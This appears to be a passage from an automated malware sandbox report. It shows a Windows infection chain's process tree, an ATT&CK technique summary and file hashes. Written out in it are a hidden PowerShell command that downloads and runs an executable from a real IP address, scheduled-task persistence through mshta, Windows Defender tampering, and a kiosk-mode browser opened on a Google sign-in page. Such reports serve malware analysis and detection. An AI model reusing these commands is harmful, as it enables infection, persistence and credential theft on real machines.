- Loads dropped DLL
PID:1600 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1964
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1188 -
C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2788 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 10127⤵
- Loads dropped DLL
- Program crash
PID:1996
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 5126⤵
- Loads dropped DLL
- Program crash
PID:2192
-
-
-
C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe"C:\Users\Admin\AppData\Local\Temp\10019520101\dw.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2204 -
C:\Windows\SysWOW64\SCHTASKS.exeSCHTASKS /Create /SC MINUTE /MO 5 /TN "XblGameSave\XblGameSvTask" /TR "C:\Users\Admin\AppData\Roaming\HexRays\frameapphost.exe" /F /RL HIGHEST6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2876
-
-
-
C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"5⤵
- Executes dropped EXE
PID:1320 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1320 -s 366⤵
- Loads dropped DLL
PID:1132
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe"5⤵
- Executes dropped EXE
PID:288 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 288 -s 366⤵
- Loads dropped DLL
PID:540
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1352 -
C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2768
-
-
-
C:\Users\Admin\AppData\Local\Temp\10029600101\mrwipre12.exe"C:\Users\Admin\AppData\Local\Temp\10029600101\mrwipre12.exe"5⤵
- Executes dropped EXE
PID:3184 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3184 -s 366⤵
- Loads dropped DLL
PID:3248
-
-
-
C:\Users\Admin\AppData\Local\Temp\10030660101\kollfdsf.exe"C:\Users\Admin\AppData\Local\Temp\10030660101\kollfdsf.exe"5⤵
- Executes dropped EXE
PID:3844 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3844 -s 366⤵PID:3872
-
-
-
C:\Users\Admin\AppData\Local\Temp\10030740101\e80c7de81f.exe"C:\Users\Admin\AppData\Local\Temp\10030740101\e80c7de81f.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3688 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10030740101\e80c7de81f.exe"6⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3896
-
-
-
C:\Users\Admin\AppData\Local\Temp\10030750101\334c4d4149.exe"C:\Users\Admin\AppData\Local\Temp\10030750101\334c4d4149.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3132 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10030750101\334c4d4149.exe"6⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2820
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10238500101\36407e4594.exe"C:\Users\Admin\AppData\Local\Temp\10238500101\36407e4594.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn DTxdJmacVn4 /tr "mshta C:\Users\Admin\AppData\Local\Temp\cfGQjUnDE.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn DTxdJmacVn4 /tr "mshta C:\Users\Admin\AppData\Local\Temp\cfGQjUnDE.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2124
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\cfGQjUnDE.hta4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:924 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5U5JI8KIGLLDZMITIZXKVREEPLQJL6VN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Users\Admin\AppData\Local\Temp5U5JI8KIGLLDZMITIZXKVREEPLQJL6VN.EXE"C:\Users\Admin\AppData\Local\Temp5U5JI8KIGLLDZMITIZXKVREEPLQJL6VN.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2828
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10238510121\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\SysWOW64\timeout.exetimeout /t 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:880 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:600
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:2176 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:380 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "FkGRumaqy0o" /tr "mshta \"C:\Temp\ply7PbHuL.hta\"" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1764
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\ply7PbHuL.hta"4⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2204 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1004
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10238890101\7c26c6a0f8.exe"C:\Users\Admin\AppData\Local\Temp\10238890101\7c26c6a0f8.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1916
-
-
C:\Users\Admin\AppData\Local\Temp\10238900101\a732227be0.exe"C:\Users\Admin\AppData\Local\Temp\10238900101\a732227be0.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:620 -
C:\Users\Admin\AppData\Local\Temp\GGM65FE7W5E2IVW6D.exe"C:\Users\Admin\AppData\Local\Temp\GGM65FE7W5E2IVW6D.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2008
-
-
-
C:\Users\Admin\AppData\Local\Temp\10238910101\df0bb5d7c6.exe"C:\Users\Admin\AppData\Local\Temp\10238910101\df0bb5d7c6.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2200
-
-
C:\Users\Admin\AppData\Local\Temp\10238920101\5c15ee7bad.exe"C:\Users\Admin\AppData\Local\Temp\10238920101\5c15ee7bad.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1500 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:580
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2620
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2480
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking4⤵PID:1604
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking5⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1596 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1596.0.1706974222\1492814891" -parentBuildID 20221007134813 -prefsHandle 1228 -prefMapHandle 1188 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eb824720-633a-44ac-ac32-01617b5ea48b} 1596 "\\.\pipe\gecko-crash-server-pipe.1596" 1304 115dae58 gpu6⤵PID:2864
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1596.1.1822713252\1331520904" -parentBuildID 20221007134813 -prefsHandle 1508 -prefMapHandle 1504 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {73bb5d60-ded1-491e-b9cb-5aa0dc826419} 1596 "\\.\pipe\gecko-crash-server-pipe.1596" 1520 e73658 socket6⤵PID:2136
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1596.2.1057527792\309890349" -childID 1 -isForBrowser -prefsHandle 2376 -prefMapHandle 2372 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 920 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f2738483-4854-4c69-91f7-e92a12461798} 1596 "\\.\pipe\gecko-crash-server-pipe.1596" 2388 1a0c0c58 tab6⤵PID:1736
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1596.3.1074235565\715250842" -childID 2 -isForBrowser -prefsHandle 2892 -prefMapHandle 2888 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 920 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9dcf5e9c-a023-4ba0-886e-3e507f9f1dd2} 1596 "\\.\pipe\gecko-crash-server-pipe.1596" 2904 1d913b58 tab6⤵PID:400
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1596.4.324165368\339859945" -childID 3 -isForBrowser -prefsHandle 3412 -prefMapHandle 3044 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 920 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c994fb06-730a-4258-906d-72c715d7e9fb} 1596 "\\.\pipe\gecko-crash-server-pipe.1596" 3656 204fb758 tab6⤵PID:3400
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1596.5.766463998\1933176592" -childID 4 -isForBrowser -prefsHandle 3776 -prefMapHandle 3780 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 920 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0bdbf4f-498e-42af-8190-e5c9cf00de59} 1596 "\\.\pipe\gecko-crash-server-pipe.1596" 3764 1edeab58 tab6⤵PID:3412
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1596.6.330813321\2072844158" -childID 5 -isForBrowser -prefsHandle 3960 -prefMapHandle 3964 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 920 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ac8a6ef-a4b0-49ba-a791-38808e975599} 1596 "\\.\pipe\gecko-crash-server-pipe.1596" 3948 1eded858 tab6⤵PID:3428
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10238930101\2331254737.exe"C:\Users\Admin\AppData\Local\Temp\10238930101\2331254737.exe"3⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3836
-
-
C:\Users\Admin\AppData\Local\Temp\10238940101\00282f69cd.exe"C:\Users\Admin\AppData\Local\Temp\10238940101\00282f69cd.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3408 -
C:\Users\Admin\AppData\Local\Temp\10238940101\00282f69cd.exe"C:\Users\Admin\AppData\Local\Temp\10238940101\00282f69cd.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3444
-
-
-
C:\Users\Admin\AppData\Local\Temp\10238950101\e80c7de81f.exe"C:\Users\Admin\AppData\Local\Temp\10238950101\e80c7de81f.exe"3⤵
- Executes dropped EXE
PID:2480
-
-
C:\Users\Admin\AppData\Local\Temp\10238960101\cbe223688e.exe"C:\Users\Admin\AppData\Local\Temp\10238960101\cbe223688e.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:3324 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3324 -s 12204⤵
- Program crash
PID:3988
-
-
-
C:\Users\Admin\AppData\Local\Temp\10238970101\334c4d4149.exe"C:\Users\Admin\AppData\Local\Temp\10238970101\334c4d4149.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3992 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10238970101\334c4d4149.exe"4⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3332
-
-
-
C:\Users\Admin\AppData\Local\Temp\10238980101\53a0816cdb.exe"C:\Users\Admin\AppData\Local\Temp\10238980101\53a0816cdb.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3112
-
-
C:\Users\Admin\AppData\Local\Temp\10238990101\UD49QH6.exe"C:\Users\Admin\AppData\Local\Temp\10238990101\UD49QH6.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3704
-
-
C:\Users\Admin\AppData\Local\Temp\10239000101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10239000101\zY9sqWs.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:3988 -
C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3500
-
-
-
C:\Users\Admin\AppData\Local\Temp\10239010101\m0wsoI3.exe"C:\Users\Admin\AppData\Local\Temp\10239010101\m0wsoI3.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:972 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\10239010101\m0wsoI3.exe" & exit4⤵
- System Location Discovery: System Language Discovery
PID:3356 -
C:\Windows\SysWOW64\timeout.exetimeout /t 55⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4012
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10239020101\HmngBpR.exe"C:\Users\Admin\AppData\Local\Temp\10239020101\HmngBpR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3392 -
C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exeC:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2876 -
C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exeC:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:3940 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:2356 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe7⤵
- System Location Discovery: System Language Discovery
PID:2164 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2164 -s 2568⤵
- Program crash
PID:1616
-
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
8Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
779B
MD539c8cd50176057af3728802964f92d49
SHA168fc10a10997d7ad00142fc0de393fe3500c8017
SHA256f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
Filesize
236KB
MD52ecb51ab00c5f340380ecf849291dbcf
SHA11a4dffbce2a4ce65495ed79eab42a4da3b660931
SHA256f1b3e0f2750a9103e46a6a4a34f1cf9d17779725f98042cc2475ec66484801cf
SHA512e241a48eafcaf99187035f0870d24d74ae97fe84aaadd2591cceea9f64b8223d77cfb17a038a58eadd3b822c5201a6f7494f26eea6f77d95f77f6c668d088e6b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L6J4GCMD\service[1].htm
Filesize1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\z3l10m6w.default-release\activity-stream.discovery_stream.json.tmp
Filesize31KB
MD59615f86e40729672c7d017b70b57d069
SHA1faff7d3496b77dbe231a753355c58ec66d525bbc
SHA2565f12e6ebdf59b52d1bc2ff5684186f86461515530c45c18871473095940a7f5b
SHA512e9fd1bcade76848cc854f9668023a687a8c48cc239c5741493436315b034a999f5ee40d1186372017113982a43e4a78f2f7c841ce88278e0b6897db7c79f14ac
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\z3l10m6w.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
19.4MB
MD5f70d82388840543cad588967897e5802
SHA1cd21b0b36071397032a181d770acd811fd593e6e
SHA2561be1102a35feb821793dd317c1d61957d95475eab0a9fdc2232f3a3052623e35
SHA5123d144eee4a770b5c625e7b5216c20d3d37942a29e08560f4ebf2c36c703831fd18784cd53f3a4a2f91148ec852454ac84fc0eb7f579bb9d11690a2978eb6eef6
-
Filesize
445KB
MD5ab09d0db97f3518a25cd4e6290862da7
SHA19e4d882e41b0ac86be4105f8aa9b3c1526dafbe0
SHA256fc8cbb7809af3ab0b5f7ed07919bbd6c66366d1ed51681a8b91783ad8dafbb3d
SHA51246553192614fd127640fead944f6e631a30d2ebae75262b5e1ff17742ef2c50bcea229bbc74800a9f1c854369012cd1645368733f1d09e8ba8b43c7819a7314a
-
Filesize
23KB
MD51f93cc8da3ab43a6a2aa45e8aa38c0f8
SHA15a89e3c7efe0d4db670f47e471290d0b6d9fcfd5
SHA256d7f94c1a0afdd5c8a5878629b865588de4d6fa0f194021c955feb7ed9f4bd10c
SHA512cb95c12d9a2eb7d984e67669950e795d3ee090743a8db039a0389908187c78fc6ff7277f7952949001fe2f98ad5006243949bb054442808c680c6cf621e35c01
-
Filesize
362KB
MD538da35e91c9aeea07d77b7df32e30591
SHA149eebb6f1db4065b62e276f61c6f2c6abc0cb66e
SHA25653d491fcb95b0cd2c073b1a2b7dc8c032e9de2d9422ac13170fe5975b78f6a7e
SHA512739d88b2df68063eb0771cfa538bc5fdf9f3485c114c454dfa0dcce554e89cc39e3b970d689bd4c8a80ad595761a39928620cf43c05feb0aea92433870f0b8e0
-
Filesize
477KB
MD564eb4ff90db568f777d165a151b1d6ba
